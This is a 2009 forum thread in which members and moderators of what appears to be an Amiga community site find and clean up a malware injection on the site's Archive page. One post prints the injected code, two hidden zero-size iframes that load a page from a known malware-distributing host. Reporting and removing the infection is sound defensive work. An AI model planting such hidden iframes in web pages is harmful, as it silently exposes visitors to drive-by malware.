Welcome, Guest. Please login or register.

Author Topic: Virus warning!  (Read 1799 times)

Description:

0 Members and 1 Guest are viewing this topic.

Offline juan_fineTopic starter

  • Newbie
  • *
  • Join Date: Jan 2007
  • Posts: 26
    • Show only replies by juan_fine
    • http://www.mousam-river.com/
Virus warning!
« on: September 05, 2009, 08:14:31 PM »
When I click on the Archive link at the bottom of the home page, Avast pops up a warning about it containing the "HTML:Iframe-inf" virus. It obviously could be a false positive, but...
 

Offline the_leander

  • Hero Member
  • *****
  • Join Date: Feb 2002
  • Posts: 3448
    • Show only replies by the_leander
    • http://www.extropia.co.uk/theleander/
Re: Virus warning!
« Reply #1 on: September 05, 2009, 08:23:57 PM »
Confirmed here too - Avast throws a fit.

Whether or not it's a false positive would require someone with another brand of scanner.

Surprising though.
Blessed Be,
Alan Fisher - the_leander

[SIGPIC]http://www.extropia.co.uk/theleander/[/SIGPIC]
 

Offline clint

  • Lifetime Member
  • Jr. Member
  • **
  • Join Date: Jun 2007
  • Posts: 81
    • Show only replies by clint
Re: Virus warning!
« Reply #2 on: September 05, 2009, 08:53:36 PM »
Norton reports Trojan.Pidief.G
 

Offline AmiSake

  • Newbie
  • *
  • Join Date: Nov 2006
  • Posts: 41
    • Show only replies by AmiSake
Re: Virus warning!
« Reply #3 on: September 05, 2009, 09:07:14 PM »
When I click on the Archive link using firefox 3.5 and Kaspersky AV 7 nothing happens. So...
is it or isn't it a virus ??

Edit: did some more checking and also Kaspersky complains about this link so it is definitely wrong...
« Last Edit: September 05, 2009, 09:12:19 PM by AmiSake »
 

Offline nOw2

  • Full Member
  • ***
  • Join Date: Jul 2002
  • Posts: 194
    • Show only replies by nOw2
Re: Virus warning!
« Reply #4 on: September 05, 2009, 09:09:06 PM »
Something nasty has happened to that page; confirm it with curl or wget but for the moment do not click on the Archive link.
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
    • Show only replies by Karlos
Re: Virus warning!
« Reply #5 on: September 05, 2009, 09:22:32 PM »
I've downloaded the page with wget and it has the following HTML appended outside the closing HTML tag

Code: [Select]
<iframe src=http://davtraff.com/lib/index.php&quot; width=0 height=0 style=&quot;hidden&quot; frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=&quot;http://davtraff.com/lib/index.php&quot; width=0 height=0 style=&quot;hidden&quot; frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
From google's safe browsing diagnostic

Quote
What is the current listing status for davtraff.com?

    Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

    Of the 284 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-09-05, and the last time suspicious content was found on this site was on 2009-09-05.

    Malicious software includes 405 trojan(s), 219 exploit(s), 1 scripting exploit(s).

    This site was hosted on 5 network(s) including AS18106 (VIEWQWEST), AS48974 (MFOREX), AS49314 (NEVAL).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, davtraff.com appeared to function as an intermediary for the infection of 213 site(s) including pcu.ac.kr/, sisa0582.com/, tryonpalace.org/.

This doesn't look like a false positive to me...
« Last Edit: September 05, 2009, 09:25:33 PM by Karlos »
int p; // A
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
    • Show only replies by Karlos
Re: Virus warning!
« Reply #6 on: September 05, 2009, 09:32:53 PM »
Ok guys. I have confirmed that the iframe HTML was appended to the file somehow and have removed the iframe from the source file.

I've let Wayne know directly. I'll see if I can confirm wether or not any other pages have been touched.
int p; // A
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
    • Show only replies by Karlos
Re: Virus warning!
« Reply #7 on: September 06, 2009, 12:02:56 AM »
Right folks, I've written a script that identifies and removes this infection from any file on the site. Luckily, it was only a few files, most of which were "dummy" index files used to hide directory contents.

The files that were affected were only modified yesterday.

Please check your malware tools again and let me know if you still see anything.
int p; // A
 

Offline the_leander

  • Hero Member
  • *****
  • Join Date: Feb 2002
  • Posts: 3448
    • Show only replies by the_leander
    • http://www.extropia.co.uk/theleander/
Re: Virus warning!
« Reply #8 on: September 06, 2009, 12:13:27 AM »
All clear here boss.
Blessed Be,
Alan Fisher - the_leander

[SIGPIC]http://www.extropia.co.uk/theleander/[/SIGPIC]
 

Offline Wayne

  • Winning!
  • Hero Member
  • *****
  • Join Date: Feb 2002
  • Posts: 3940
    • Show only replies by Wayne
    • http://www.whyzzat.com
Re: Virus warning!
« Reply #9 on: September 08, 2009, 08:29:25 PM »
Sorry for not addressing this sooner as it was a holiday weekend and I had taken Friday off.

After reviewing the logs and accesses of the site, Karlos and I are fairly certain that someone gained access to upload a script which allowed them to either upload, or create hundreds of bogus .html files for drug sales through a remnant Xoops file (the comics feature).

That hole has now been closed and all site and FTP passwords are being changed.  If you want to go ahead and change your own password, that'd be cool too, but I can't change it for 6000 people manually.

As for the hack itself, it seems to have been fairly innocuous and hopefully should not have affected anyone -- especially if you have a virus scanner active.

While I would have -- as always -- appreciated this being discussed privately versus the mass panic caused by discussing it in a public thread, I do appreciate it bring brought to my attention and hope it's now been handled.

We now have a couple of scripts in place to check for rogue accesses and have been checking every few hours without finding anything as of yet.

http://google.com/safebrowsing/diagnostic?site=amiga.org

Wayne
//* Signature Free *//